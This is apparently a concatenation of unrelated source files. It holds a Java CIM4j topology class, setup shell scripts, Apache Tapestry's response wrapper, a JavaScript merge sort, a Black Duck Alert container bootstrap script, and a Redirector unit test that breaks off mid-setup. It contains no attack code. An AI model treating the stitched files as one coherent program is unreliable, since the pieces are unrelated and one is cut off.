python transformers/examples/language-modeling/run_language_modeling.py --model_name_or_path train-outputs/1024+0+512-shuffled-N-VB/7-model --tokenizer_name model-configs/1536-config --eval_data_file ../data/wikitext-103-raw/wiki.valid.raw --output_dir eval-outputs/1024+0+512-shuffled-N-VB/7-1024+0+512-N-IP-first-256 --do_eval --per_device_eval_batch_size 1 --dataloader_drop_last --augmented --augmentation_function replace_all_but_nouns_first_two_thirds_sixth --eval_function penultimate_sixth_eval
package cim4j; import java.util.List; import java.util.Map; import java.util.HashMap; import cim4j.BaseClass; import java.lang.ArrayIndexOutOfBoundsException; import java.lang.IllegalArgumentException; import cim4j.Date; /* Version details. */ public class TopologyVersion extends BaseClass { private BaseClass[] TopologyVersion_class_attributes; private BaseClass[] TopologyVersion_primitive_attributes; private java.lang.String rdfid; public void setRdfid(java.lang.String id) { rdfid = id; } private abstract interface PrimitiveBuilder { public abstract BaseClass construct(java.lang.String value); }; private enum TopologyVersion_primitive_builder implements PrimitiveBuilder { baseUML(){ public BaseClass construct (java.lang.String value) { return new String(value); } }, baseURI(){ public BaseClass construct (java.lang.String value) { return new String(value); } }, differenceModelURI(){ public BaseClass construct (java.lang.String value) { return new String(value); } }, entsoeUML(){ public BaseClass construct (java.lang.String value) { return new String(value); } }, entsoeURI(){ public BaseClass construct (java.lang.String value) { return new String(value); } }, modelDescriptionURI(){ public BaseClass construct (java.lang.String value) { return new String(value); } }, namespaceRDF(){ public BaseClass construct (java.lang.String value) { return new String(value); } }, namespaceUML(){ public BaseClass construct (java.lang.String value) { return new String(value); } }, shortName(){ public BaseClass construct (java.lang.String value) { return new String(value); } }, LAST_ENUM() { public BaseClass construct (java.lang.String value) { return new cim4j.Integer("0"); } }; } private enum TopologyVersion_class_attributes_enum { baseUML, baseURI, date, differenceModelURI, entsoeUML, entsoeURI, modelDescriptionURI, namespaceRDF, namespaceUML, shortName, LAST_ENUM; } public TopologyVersion() { TopologyVersion_primitive_attributes = new 
BaseClass[TopologyVersion_primitive_builder.values().length]; TopologyVersion_class_attributes = new BaseClass[TopologyVersion_class_attributes_enum.values().length]; } public void updateAttributeInArray(TopologyVersion_class_attributes_enum attrEnum, BaseClass value) { try { TopologyVersion_class_attributes[attrEnum.ordinal()] = value; } catch (ArrayIndexOutOfBoundsException aoobe) { System.out.println("No such attribute: " + attrEnum.name() + ": " + aoobe.getMessage()); } } public void updateAttributeInArray(TopologyVersion_primitive_builder attrEnum, BaseClass value) { try { TopologyVersion_primitive_attributes[attrEnum.ordinal()] = value; } catch (ArrayIndexOutOfBoundsException aoobe) { System.out.println("No such attribute: " + attrEnum.name() + ": " + aoobe.getMessage()); } } public void setAttribute(java.lang.String attrName, BaseClass value) { try { TopologyVersion_class_attributes_enum attrEnum = TopologyVersion_class_attributes_enum.valueOf(attrName); updateAttributeInArray(attrEnum, value); System.out.println("Updated TopologyVersion, setting " + attrName); } catch (IllegalArgumentException iae) { super.setAttribute(attrName, value); } } /* If the attribute is a String, it is a primitive and we will make it into a BaseClass */ public void setAttribute(java.lang.String attrName, java.lang.String value) { try { TopologyVersion_primitive_builder attrEnum = TopologyVersion_primitive_builder.valueOf(attrName); updateAttributeInArray(attrEnum, attrEnum.construct(value)); System.out.println("Updated TopologyVersion, setting " + attrName + " to: " + value); } catch (IllegalArgumentException iae) { super.setAttribute(attrName, value); } } public java.lang.String toString(boolean topClass) { java.lang.String result = ""; java.lang.String indent = ""; if (topClass) { for (TopologyVersion_primitive_builder attrEnum: TopologyVersion_primitive_builder.values()) { BaseClass bc = TopologyVersion_primitive_attributes[attrEnum.ordinal()]; if (bc != null) { result += " 
TopologyVersion." + attrEnum.name() + "(" + bc.debugString() + ")" + " " + bc.toString(false) + System.lineSeparator(); } } for (TopologyVersion_class_attributes_enum attrEnum: TopologyVersion_class_attributes_enum.values()) { BaseClass bc = TopologyVersion_class_attributes[attrEnum.ordinal()]; if (bc != null) { result += " TopologyVersion." + attrEnum.name() + "(" + bc.debugString() + ")" + " " + bc.toString(false) + System.lineSeparator(); } } result += super.toString(true); } else { result += "(TopologyVersion) RDFID: " + rdfid; } return result; } public final java.lang.String debugName = "TopologyVersion"; public java.lang.String debugString() { return debugName; } public void setValue(java.lang.String s) { System.out.println(debugString() + " is not sure what to do with " + s); } public BaseClass construct() { return new TopologyVersion(); } };
#!/bin/sh set -e set -x FILE=$1 mkfifo "$FILE" TYPE=$(stat -c %F "$FILE") if [ "$TYPE" != "fifo" ]; then echo "$FILE is not a fifo: $TYPE != fifo" exit 1 fi
#!/bin/bash curl https://pkg.jenkins.io/debian/jenkins-ci.org.key | sudo apt-key add - sudo sh -c 'echo deb http://pkg.jenkins.io/debian-stable binary/ > /etc/apt/sources.list.d/jenkins.list' sudo apt-get -y update sudo apt-get -y install jenkins
#!/usr/bin/env bash ## Traffic going to the internet route add default gw 172.30.30.1 ## NAT iptables -t nat -A POSTROUTING -o enp0s8 -j MASQUERADE iptables -t nat -A PREROUTING -i enp0s8 -s 172.16.16.16 -j DNAT --to-destination 10.2.0.2 iptables -t nat -A PREROUTING -i enp0s8 -s 172.18.18.18 -j DNAT --to-destination 10.2.0.3 ## Save the iptables rules iptables-save > /etc/iptables/rules.v4 ip6tables-save > /etc/iptables/rules.v6
/**
 * Minimal fork/join helper for running two side-effecting blocks in parallel.
 */
object ParUnit {
  /**
   * Runs `a` on a fresh thread while `b` runs on the caller's thread,
   * returning only after both have completed.
   *
   * Both parameters are by-name, so evaluation is deferred until each
   * thread actually runs its block.
   */
  // BUGFIX: removed the leading "<gh_stars>0" residue marker, which is not
  // valid Scala and prevented the file from compiling.
  def par(a: =>Unit)(b: =>Unit) = {
    val worker = new Runnable { def run() = a }
    val thread = new Thread(worker)
    thread.start()
    b
    thread.join()
  }
}
#!/bin/sh docker-compose exec web python manage.py makemigrations --noinput
<reponame>nevans/capybara-chromedriver-logger module Capybara module Chromedriver module Logger class JsError < StandardError end end end end
// Copyright 2006, 2007, 2008, 2009, 2010 The Apache Software Foundation // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. package org.apache.tapestry5.internal.services; import java.io.BufferedWriter; import java.io.IOException; import java.io.OutputStream; import java.io.OutputStreamWriter; import java.io.PrintWriter; import java.io.Writer; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import org.apache.tapestry5.Link; import org.apache.tapestry5.internal.InternalConstants; import org.apache.tapestry5.ioc.internal.util.InternalUtils; import org.apache.tapestry5.services.Response; /** * Implementation of {@link Response} that wraps around an underlying {@link HttpServletResponse}. 
*/
public class ResponseImpl implements Response
{
    // Kept only so disableCompression() can set a request attribute.
    private final HttpServletRequest request;

    // The wrapped servlet response; every method below delegates to it.
    private final HttpServletResponse response;

    public ResponseImpl(HttpServletRequest request, HttpServletResponse response)
    {
        assert request != null;
        assert response != null;
        this.request = request;
        this.response = response;
    }

    /**
     * Sets the response content type, then wraps the servlet output stream in a
     * buffered PrintWriter using the response's character encoding.
     */
    public PrintWriter getPrintWriter(String contentType) throws IOException
    {
        assert InternalUtils.isNonBlank(contentType);
        OutputStream os = getOutputStream(contentType);
        Writer w = new OutputStreamWriter(os, response.getCharacterEncoding());
        return new PrintWriter(new BufferedWriter(w));
    }

    // --- Straight delegation to the wrapped HttpServletResponse ---

    public String encodeURL(String URL)
    {
        return response.encodeURL(URL);
    }

    public String encodeRedirectURL(String URL)
    {
        return response.encodeRedirectURL(URL);
    }

    public void sendRedirect(String URL) throws IOException
    {
        response.sendRedirect(URL);
    }

    /** Encodes the link's redirect URI (adding the session id if needed) before redirecting. */
    public void sendRedirect(Link link) throws IOException
    {
        assert link != null;
        String redirectURL = encodeRedirectURL(link.toRedirectURI());
        sendRedirect(redirectURL);
    }

    public void setStatus(int sc)
    {
        response.setStatus(sc);
    }

    /** Sets the content type and returns the raw servlet output stream. */
    public OutputStream getOutputStream(String contentType) throws IOException
    {
        assert InternalUtils.isNonBlank(contentType);
        response.setContentType(contentType);
        return response.getOutputStream();
    }

    public void sendError(int sc, String message) throws IOException
    {
        response.sendError(sc, message);
    }

    public void setContentLength(int length)
    {
        response.setContentLength(length);
    }

    public void setDateHeader(String name, long date)
    {
        response.setDateHeader(name, date);
    }

    public void setHeader(String name, String value)
    {
        response.setHeader(name, value);
    }

    public void addHeader(String name, String value)
    {
        response.addHeader(name, value);
    }

    public void setIntHeader(String name, int value)
    {
        response.setIntHeader(name, value);
    }

    public boolean isCommitted()
    {
        return response.isCommitted();
    }

    /** Flags the *request* so Tapestry's GZip filter skips compressing this response. */
    public void disableCompression()
    {
        request.setAttribute(InternalConstants.SUPPRESS_COMPRESSION, true);
    }
}
<filename>challenges/sorting-algorithms/solutions/javascript/merge-sort/solution.js import readline from 'node:readline' const numbers = [] const readlineInterface = readline.createInterface({ input: process.stdin, output: process.stdout }) readlineInterface.on('line', (value) => { numbers.push(Number(value)) }) readlineInterface.on('close', solution) function solution() { const sortedNumbers = mergeSort(numbers.slice(1)) sortedNumbers.forEach((number) => { console.log(number) }) } function divideArray (numbers) { const middle = Math.round(numbers.length / 2) const left = numbers.slice(0, middle) const right = numbers.slice(middle) return [left, right] } function merge (numbers1, numbers2) { let indexNumbers1 = 0 let indexNumbers2 = 0 const result = [] while (indexNumbers1 < numbers1.length && indexNumbers2 < numbers2.length) { if (numbers1[indexNumbers1] < numbers2[indexNumbers2]) { result.push(numbers1[indexNumbers1]) indexNumbers1 += 1 } else { result.push(numbers2[indexNumbers2]) indexNumbers2 += 1 } } for (let index = indexNumbers1; index < numbers1.length; index++) { result.push(numbers1[index]) } for (let index = indexNumbers2; index < numbers2.length; index++) { result.push(numbers2[index]) } return result } function mergeSort (numbers) { if (numbers.length <= 1) { return numbers } let [left, right] = divideArray(numbers) left = mergeSort(left) right = mergeSort(right) return merge(left, right) }
#!/bin/sh
#
# Bootstrap for the Black Duck Alert container.
# Resolves configuration from environment variables and Docker secrets, sets up
# certificates (via the cfssl CA), key/trust stores, validates the external
# Postgres database, migrates a legacy H2 database when present, and finally
# exec's the container command.
#
# Fixes in this revision:
#   - ALERT_DB_SSL_ROOT_CERT_PATH was exported as the literal string
#     "alertDatabaseSslRootCert" (missing "$").
#   - The main body tested $secretsMountPath, which is never defined; the
#     secrets directory variable is $dockerSecretDir.
#   - Copy-pasted log messages corrected (SSL cert / root cert secrets logged
#     as "SSL key"; trustBlackDuckSystemCertificate logged "root certificate").

certificateManagerDir=/opt/blackduck/alert/bin
securityDir=/opt/blackduck/alert/security
alertHome=/opt/blackduck/alert
alertConfigHome=${alertHome}/alert-config
alertDataDir=${alertConfigHome}/data
alertDatabaseDir=${alertDataDir}/alertdb

# Database connection settings; each may be overridden via environment.
alertDatabaseHost="${ALERT_DB_HOST:-alertdb}"
alertDatabasePort="${ALERT_DB_PORT:-5432}"
alertDatabaseName="${ALERT_DB_NAME:-alertdb}"
alertDatabaseUser="${ALERT_DB_USERNAME:-sa}"
alertDatabasePassword="${ALERT_DB_PASSWORD:-blackduck}"
alertDatabaseAdminUser="${ALERT_DB_ADMIN_USERNAME:-$alertDatabaseUser}"
alertDatabaseAdminPassword="${ALERT_DB_ADMIN_PASSWORD:-$alertDatabasePassword}"
alertDatabaseSslMode="${ALERT_DB_SSL_MODE:-allow}"
alertDatabaseSslKey=${ALERT_DB_SSL_KEY}
alertDatabaseSslCert=${ALERT_DB_SSL_CERT}
alertDatabaseSslRootCert=${ALERT_DB_SSL_ROOT_CERT}

upgradeResourcesDir=$alertHome/alert-tar/upgradeResources
serverCertName=$APPLICATION_NAME-server
dockerSecretDir=${RUN_SECRETS_DIR:-/run/secrets}

keyStoreFile=$APPLICATION_NAME.keystore
keystoreFilePath=$securityDir/$keyStoreFile
keystorePassword="${ALERT_KEY_STORE_PASSWORD:-changeit}"
truststoreFile=$securityDir/$APPLICATION_NAME.truststore
truststorePassword="${ALERT_TRUST_STORE_PASSWORD:-changeit}"
truststoreType="${ALERT_TRUST_STORE_TYPE:-JKS}"

alertHostName="${ALERT_HOSTNAME:-localhost}"
targetCAHost="${HUB_CFSSL_HOST:-cfssl}"
targetCAPort="${HUB_CFSSL_PORT:-8888}"
targetWebAppHost="${HUB_WEBAPP_HOST:-alert}"

# Warn when no explicit hostname was configured (localhost is rarely correct).
[ -z "$ALERT_HOSTNAME" ] && echo "Alert Host: [$alertHostName]. Wrong host name? Restart the container with the right host name configured in blackduck-alert.env"

# --- Docker secrets override the corresponding environment/defaults ---

if [ -e $dockerSecretDir/ALERT_TRUST_STORE_PASSWORD ]; then
    echo "Trust Store secret set; using value from secret."
    truststorePassword=$(cat $dockerSecretDir/ALERT_TRUST_STORE_PASSWORD | xargs echo)
fi

if [ -e $dockerSecretDir/ALERT_KEY_STORE_PASSWORD ]; then
    echo "Key Store secret set; using value from secret."
    keystorePassword=$(cat $dockerSecretDir/ALERT_KEY_STORE_PASSWORD | xargs echo)
fi

if [ -e $dockerSecretDir/ALERT_DB_USERNAME ]; then
    echo "Alert Database user secret set; using value from secret."
    alertDatabaseUser=$(cat $dockerSecretDir/ALERT_DB_USERNAME | xargs echo)
    export ALERT_DB_USERNAME=$alertDatabaseUser;
    # The admin user defaults to the regular user unless its own secret (below) overrides it.
    alertDatabaseAdminUser=$alertDatabaseUser;
    export ALERT_DB_ADMIN_USERNAME=$alertDatabaseAdminUser;
    echo "Alert Database user variable set to secret value."
fi

if [ -e $dockerSecretDir/ALERT_DB_PASSWORD ]; then
    echo "Alert Database password secret set; using value from secret."
    alertDatabasePassword=$(cat $dockerSecretDir/ALERT_DB_PASSWORD | xargs echo)
    export ALERT_DB_PASSWORD=$alertDatabasePassword;
    alertDatabaseAdminPassword=$alertDatabasePassword;
    export ALERT_DB_ADMIN_PASSWORD=$alertDatabaseAdminPassword;
    echo "Alert Database password variable set to secret value."
fi

if [ -e $dockerSecretDir/ALERT_DB_ADMIN_USERNAME ]; then
    echo "Alert Database admin user secret set; using value from secret."
    alertDatabaseAdminUser=$(cat $dockerSecretDir/ALERT_DB_ADMIN_USERNAME | xargs echo)
    export ALERT_DB_ADMIN_USERNAME=$alertDatabaseAdminUser;
    echo "Alert Database admin user variable set to secret value."
fi

if [ -e $dockerSecretDir/ALERT_DB_ADMIN_PASSWORD ]; then
    echo "Alert Database admin password secret set; using value from secret."
    alertDatabaseAdminPassword=$(cat $dockerSecretDir/ALERT_DB_ADMIN_PASSWORD | xargs echo)
    export ALERT_DB_ADMIN_PASSWORD=$alertDatabaseAdminPassword;
    echo "Alert Database admin password variable set to secret value."
fi

# SSL material secrets hold file *paths*, not contents.
if [ -e $dockerSecretDir/ALERT_DB_SSL_KEY_PATH ]; then
    echo "Alert Database SSL key set; using value from secret."
    alertDatabaseSslKey=$dockerSecretDir/ALERT_DB_SSL_KEY_PATH
    export ALERT_DB_SSL_KEY_PATH=$alertDatabaseSslKey
    echo "Alert Database SSL key variable set to secret value."
fi

if [ -e $dockerSecretDir/ALERT_DB_SSL_CERT_PATH ]; then
    echo "Alert Database SSL cert set; using value from secret."
    alertDatabaseSslCert=$dockerSecretDir/ALERT_DB_SSL_CERT_PATH
    export ALERT_DB_SSL_CERT_PATH=$alertDatabaseSslCert
    echo "Alert Database SSL cert variable set to secret value."
fi

if [ -e $dockerSecretDir/ALERT_DB_SSL_ROOT_CERT_PATH ]; then
    echo "Alert Database SSL root cert set; using value from secret."
    alertDatabaseSslRootCert=$dockerSecretDir/ALERT_DB_SSL_ROOT_CERT_PATH
    # BUGFIX: was exported without "$", i.e. the literal string "alertDatabaseSslRootCert".
    export ALERT_DB_SSL_ROOT_CERT_PATH=$alertDatabaseSslRootCert
    echo "Alert Database SSL root cert variable set to secret value."
fi

# libpq keyword/value connection strings used by every psql invocation below.
alertDatabaseAdminConfig="host=$alertDatabaseHost port=$alertDatabasePort dbname=$alertDatabaseName user=$alertDatabaseAdminUser password=$alertDatabaseAdminPassword sslmode=$alertDatabaseSslMode sslkey=$alertDatabaseSslKey sslcert=$alertDatabaseSslCert sslrootcert=$alertDatabaseSslRootCert"
alertDatabaseConfig="host=$alertDatabaseHost port=$alertDatabasePort dbname=$alertDatabaseName user=$alertDatabaseUser password=$alertDatabasePassword sslmode=$alertDatabaseSslMode sslkey=$alertDatabaseSslKey sslcert=$alertDatabaseSslCert sslrootcert=$alertDatabaseSslRootCert"

echo "Alert max heap size: $ALERT_MAX_HEAP_SIZE"
echo "Certificate authority host: $targetCAHost"
echo "Certificate authority port: $targetCAPort"

# Ensure the directory that holds all certificate/store files exists.
createCertificateStoreDirectory() {
    echo "Checking certificate store directory"
    if [ -d $securityDir ]; then
        echo "Certificate store directory $securityDir exists"
    else
        mkdir -p -v $securityDir
    fi
}

# Fetch the CA root certificate (used when a custom webserver cert is supplied).
manageRootCertificate() {
    $certificateManagerDir/certificate-manager.sh root \
        --ca $targetCAHost:$targetCAPort \
        --outputDirectory $securityDir \
        --profile peer
}

# Generate the server certificate/key signed by the cfssl CA.
manageSelfSignedServerCertificate() {
    echo "Attempting to generate $APPLICATION_NAME self-signed server certificate and key."
    $certificateManagerDir/certificate-manager.sh server-cert \
        --ca $targetCAHost:$targetCAPort \
        --rootcert $securityDir/root.crt \
        --key $securityDir/$serverCertName.key \
        --cert $securityDir/$serverCertName.crt \
        --outputDirectory $securityDir \
        --commonName $serverCertName \
        --san $targetWebAppHost \
        --san $alertHostName \
        --san localhost \
        --hostName $targetWebAppHost
    exitCode=$?
    if [ $exitCode -eq 0 ]; then
        echo "Generated $APPLICATION_NAME self-signed server certificate and key."
        chmod 644 $securityDir/root.crt
        # Private key is readable by owner only.
        chmod 400 $securityDir/$serverCertName.key
        chmod 644 $securityDir/$serverCertName.crt
    else
        echo "ERROR: Unable to generate $APPLICATION_NAME self-signed server certificate and key (Code: $exitCode)."
        exit $exitCode
    fi
}

# Generate the blackduck_system client cert/key, its keystore, and trust the CA root in it.
manageBlackduckSystemClientCertificate() {
    echo "Attempting to generate blackduck_system client certificate and key."
    $certificateManagerDir/certificate-manager.sh client-cert \
        --ca $targetCAHost:$targetCAPort \
        --outputDirectory $securityDir \
        --commonName blackduck_system
    exitCode=$?
    if [ $exitCode -eq 0 ]; then
        chmod 400 $securityDir/blackduck_system.key
        chmod 644 $securityDir/blackduck_system.crt
    else
        echo "ERROR: Unable to generate blackduck_system certificate and key (Code: $exitCode)."
        exit $exitCode
    fi

    echo "Attempting to generate blackduck_system store."
    $certificateManagerDir/certificate-manager.sh keystore \
        --outputDirectory $securityDir \
        --outputFile blackduck_system.keystore \
        --password changeit \
        --keyAlias blackduck_system \
        --key $securityDir/blackduck_system.key \
        --cert $securityDir/blackduck_system.crt
    exitCode=$?
    if [ $exitCode -ne 0 ]; then
        echo "ERROR: Unable to generate blackduck_system store (Code: $exitCode)."
        exit $exitCode
    fi

    echo "Attempting to trust root certificate within the blackduck_system store."
    $certificateManagerDir/certificate-manager.sh trust-java-cert \
        --store $securityDir/blackduck_system.keystore \
        --password changeit \
        --cert $securityDir/root.crt \
        --certAlias blackduck_root
    exitCode=$?
    if [ $exitCode -ne 0 ]; then
        echo "ERROR: Unable to trust root certificate within the blackduck_system store (Code: $exitCode)."
        exit $exitCode
    fi
}

# Build the Java truststore: custom jssecacerts/cacerts secret wins, else copy the JRE's cacerts.
createTruststore() {
    if [ -f $dockerSecretDir/jssecacerts ]; then
        echo "Custom jssecacerts file found."
        echo "Copying file jssecacerts to the certificate location"
        cp $dockerSecretDir/jssecacerts $securityDir/$APPLICATION_NAME.truststore
    elif [ -f $dockerSecretDir/cacerts ]; then
        echo "Custom cacerts file found."
        echo "Copying file cacerts to the certificate location"
        cp $dockerSecretDir/cacerts $securityDir/$APPLICATION_NAME.truststore
    else
        echo "Attempting to copy Java cacerts to create truststore."
        $certificateManagerDir/certificate-manager.sh truststore --outputDirectory $securityDir --outputFile $APPLICATION_NAME.truststore
        exitCode=$?
        if [ ! $exitCode -eq 0 ]; then
            echo "Unable to create truststore (Code: $exitCode)."
            exit $exitCode
        fi
    fi
}

# Import the CA root certificate into the truststore.
trustRootCertificate() {
    $certificateManagerDir/certificate-manager.sh trust-java-cert \
        --store $truststoreFile \
        --password $truststorePassword \
        --cert $securityDir/root.crt \
        --certAlias hub-root
    exitCode=$?
    if [ $exitCode -eq 0 ]; then
        echo "Successfully imported BlackDuck root certificate into Java truststore."
    else
        echo "Unable to import BlackDuck root certificate into Java truststore (Code: $exitCode)."
        exit $exitCode
    fi
}

# Import the blackduck_system client certificate into the truststore.
trustBlackDuckSystemCertificate() {
    $certificateManagerDir/certificate-manager.sh trust-java-cert \
        --store $truststoreFile \
        --password $truststorePassword \
        --cert $securityDir/blackduck_system.crt \
        --certAlias blackduck_system
    exitCode=$?
    if [ $exitCode -eq 0 ]; then
        echo "Successfully imported BlackDuck system certificate into Java truststore."
    else
        echo "Unable to import BlackDuck system certificate into Java truststore (Code: $exitCode)."
        exit $exitCode
    fi
}

# Import an optional proxy certificate; a failure here is non-fatal.
trustProxyCertificate() {
    proxyCertificate="$dockerSecretDir/HUB_PROXY_CERT_FILE"

    if [ ! -f "$dockerSecretDir/HUB_PROXY_CERT_FILE" ]; then
        echo "WARNING: Proxy certificate file is not found in secret. Skipping Proxy Certificate Import."
    else
        $certificateManagerDir/certificate-manager.sh trust-java-cert \
            --store $truststoreFile \
            --password $truststorePassword \
            --cert $proxyCertificate \
            --certAlias proxycert
        exitCode=$?
        if [ $exitCode -eq 0 ]; then
            echo "Successfully imported proxy certificate into Java truststore."
        else
            echo "Unable to import proxy certificate into Java truststore (Code: $exitCode)."
        fi
    fi
}

# Build the webserver keystore from the generated (or custom, if secrets provide one) cert/key.
createKeystore() {
    certKey=$securityDir/$serverCertName.key
    certFile=$securityDir/$serverCertName.crt
    if [ -f $dockerSecretDir/WEBSERVER_CUSTOM_CERT_FILE ] && [ -f $dockerSecretDir/WEBSERVER_CUSTOM_KEY_FILE ]; then
        certKey="${dockerSecretDir}/WEBSERVER_CUSTOM_KEY_FILE"
        certFile="${dockerSecretDir}/WEBSERVER_CUSTOM_CERT_FILE"
        echo "Custom webserver cert and key found"
        echo "Using $certFile and $certKey for webserver"
    fi

    # Create the keystore with given private key and certificate.
    echo "Attempting to create keystore."
    $certificateManagerDir/certificate-manager.sh keystore \
        --outputDirectory $securityDir \
        --outputFile $keyStoreFile \
        --password $keystorePassword \
        --keyAlias $APPLICATION_NAME \
        --key $certKey \
        --cert $certFile
    exitCode=$?
    if [ $exitCode -eq 0 ]; then
        chmod 644 $keystoreFilePath
    else
        echo "Unable to create keystore (Code: $exitCode)."
        exit $exitCode
    fi
}

# Trust the blackduck_system certificate inside the webserver keystore as well.
importBlackDuckSystemCertificateIntoKeystore() {
    $certificateManagerDir/certificate-manager.sh trust-java-cert \
        --store $keystoreFilePath \
        --password $keystorePassword \
        --cert $securityDir/blackduck_system.crt \
        --certAlias blackduck_system
    exitCode=$?
    if [ $exitCode -eq 0 ]; then
        echo "Successfully imported BlackDuck system certificate into Java keystore."
    else
        echo "Unable to import BlackDuck system certificate into Java keystore (Code: $exitCode)."
        exit $exitCode
    fi
}

# Bootstrap will optionally configure the config volume if it hasnt been configured yet.
# After that we verify, and then launch the webserver.

# Fetch and trust hub.docker.com's TLS certificate unless it is already present.
importDockerHubServerCertificate(){
    if keytool -list -keystore "$truststoreFile" -storepass $truststorePassword -alias "hub.docker.com"
    then
        echo "The Docker Hub certificate is already imported."
    else
        if keytool -printcert -rfc -sslserver "hub.docker.com" -v | keytool -importcert -keystore "$truststoreFile" -storepass $truststorePassword -alias "hub.docker.com" -noprompt
        then
            echo "Completed importing Docker Hub certificate."
        else
            echo "Unable to add the Docker Hub certificate. Please try to import the certificate manually."
        fi
    fi
}

# Release any stale liquibase changelog lock left in the legacy H2 database.
liquibaseChangelockReset() {
    echo "Begin releasing liquibase changeloglock."
    $JAVA_HOME/bin/java -cp "$alertHome/alert-tar/lib/liquibase/*" \
        liquibase.integration.commandline.Main \
        --url="jdbc:h2:file:$alertDatabaseDir" \
        --username="sa" \
        --password="" \
        --driver="org.h2.Driver" \
        --changeLogFile="$upgradeResourcesDir/release-locks-changelog.xml" \
        releaseLocks
    echo "End releasing liquibase changeloglock."
}

validatePostgresConnection() {
    # Since the database is now external to the alert container verify we can connect to the database before starting.
    # https://stackoverflow.com/a/58784528/6921621
    echo "Checking for postgres connectivity... "
    if psql "${alertDatabaseConfig}" -c '\l' > /dev/null; then
        echo "Alert postgres database connection valid."
    else
        echo "Alert postgres connection cannot be made."
        # Pause so the failure is visible in container logs before restart loops.
        sleep 10
        exit 1
    fi
}

createPostgresDatabase() {
    # Since the database is now external to the alert container check if the database, schema, and tables have been created for alert.
    # https://stackoverflow.com/a/58784528/6921621
    echo "Checking if $alertDatabaseName exists... "
    if psql "${alertDatabaseConfig}" -c '\l' |grep -q "$alertDatabaseName"; then
        echo "Alert postgres database exists."
        if psql "${alertDatabaseConfig}" -c '\dt ALERT.*' |grep -q 'field_values'; then
            echo "Alert postgres database tables have been successfully created."
        else
            echo "Alert postgres database tables have not been created. Creating database tables for database: $alertDatabaseName "
            psql "${alertDatabaseConfig}" -f ${upgradeResourcesDir}/init_alert_db.sql
        fi
    else
        echo "Alert postgres database does not exist. Please create the database: $alertDatabaseName"
        sleep 10
        exit 1
    fi
}

validatePostgresDatabase() {
    # https://stackoverflow.com/a/58784528/6921621
    echo "Checking for postgres databases... "
    if psql "${alertDatabaseConfig}" -c '\l' | grep -q "$alertDatabaseName"; then
        echo "Alert postgres database exists."
        if psql "${alertDatabaseConfig}" -c '\dt ALERT.*' |grep -q 'field_values'; then
            echo "Alert postgres database tables have been successfully created."
        else
            echo "Alert postgres database tables have not been created."
            sleep 10
            exit 1
        fi
    else
        echo "Alert postgres database does not exist."
        sleep 10
        exit 1
    fi
}

# One-time migration of a legacy H2 database into Postgres for the 6.0.0 upgrade.
postgresPrepare600Upgrade() {
    echo "Determining if preparation for 6.0.0 upgrade is necessary..."
    if psql "${alertDatabaseConfig}" -c 'SELECT COUNT(CONTEXT) FROM Alert.Config_Contexts;' | grep -q '2'; then
        echo "Alert postgres database is initialized."
    else
        echo "Preparing the old Alert database to be upgraded to 6.0.0..."
        if [ -f "${alertDataDir}/alertdb.mv.db" ]; then
            echo "A previous database existed."
            liquibaseChangelockReset
            echo "Clearing old checksums for offline upgrade..."
            ${JAVA_HOME}/bin/java -cp "$alertHome/alert-tar/lib/liquibase/*" \
                liquibase.integration.commandline.Main \
                --url="jdbc:h2:file:${alertDatabaseDir}" \
                --username="sa" \
                --password="" \
                --driver="org.h2.Driver" \
                --changeLogFile="${upgradeResourcesDir}/changelog-master.xml" \
                clearCheckSums
            echo "Upgrading old database to 5.3.0 so that it can be properly exported..."
            ${JAVA_HOME}/bin/java -cp "$alertHome/alert-tar/lib/liquibase/*" \
                liquibase.integration.commandline.Main \
                --url="jdbc:h2:file:${alertDatabaseDir}" \
                --username="sa" \
                --password="" \
                --driver="org.h2.Driver" \
                --changeLogFile="${upgradeResourcesDir}/changelog-master.xml" \
                update
            echo "Creating temp directory for data migration..."
            mkdir ${alertConfigHome}/data/temp
            chmod 766 ${alertConfigHome}/data/temp
            echo "Exporting data from old database..."
            $JAVA_HOME/bin/java -cp "${alertHome}/alert-tar/lib/liquibase/*" \
                org.h2.tools.RunScript \
                -url "jdbc:h2:${alertDatabaseDir}" \
                -user "sa" \
                -password "" \
                -driver "org.h2.Driver" \
                -script ${upgradeResourcesDir}/export_h2_tables.sql
            chmod 766 ${alertConfigHome}/data/temp/*
            echo "Importing data from old database into new database..."
            psql "${alertDatabaseConfig}" -f ${upgradeResourcesDir}/import_postgres_tables.sql
        else
            echo "No previous database existed."
        fi
    fi
}

# Extensions require admin credentials, hence the admin connection string.
createPostgresExtensions() {
    echo "Creating required postgres extensions."
    psql "${alertDatabaseAdminConfig}" -f ${upgradeResourcesDir}/create_extension.sql
}

# --- Main ---
if [ ! -f "$certificateManagerDir/certificate-manager.sh" ]; then
    echo "ERROR: certificate management script is not present."
    sleep 10
    exit 1;
else
    validatePostgresConnection
    createCertificateStoreDirectory
    # BUGFIX: was $secretsMountPath, which is never defined; secrets live in $dockerSecretDir.
    if [ -f $dockerSecretDir/WEBSERVER_CUSTOM_CERT_FILE ] && [ -f $dockerSecretDir/WEBSERVER_CUSTOM_KEY_FILE ]; then
        echo "Custom webserver cert and key found"
        manageRootCertificate
    else
        manageSelfSignedServerCertificate
    fi
    manageBlackduckSystemClientCertificate
    createTruststore
    trustRootCertificate
    trustBlackDuckSystemCertificate
    trustProxyCertificate
    createKeystore
    importBlackDuckSystemCertificateIntoKeystore
    importDockerHubServerCertificate
    createPostgresDatabase
    validatePostgresDatabase
    postgresPrepare600Upgrade
    createPostgresExtensions
    liquibaseChangelockReset
    if [ -f "$truststoreFile" ]; then
        JAVA_OPTS="$JAVA_OPTS -Xmx$ALERT_MAX_HEAP_SIZE -Djavax.net.ssl.trustStore=$truststoreFile"
        export JAVA_OPTS
    fi
fi

exec "$@"
'use strict';

const request = require('superagent');
const Redirector = require('./redirector');

// Unit tests for Redirector.save: verify the superagent request chain
// (post -> send -> set -> set) is invoked with the expected URL, payload,
// and headers. `sinon` and `expect` are assumed to be globals provided by
// the test runner setup — TODO confirm.
describe('Redirector', () => {
    let revision;
    let defaultConfig;
    let expectedResult;
    let postStub;
    let sendStub;
    let setStub;
    let requestStub;

    beforeEach(() => {
        revision = 13;
        defaultConfig = {
            redirector: {
                url: 'https://test_url',
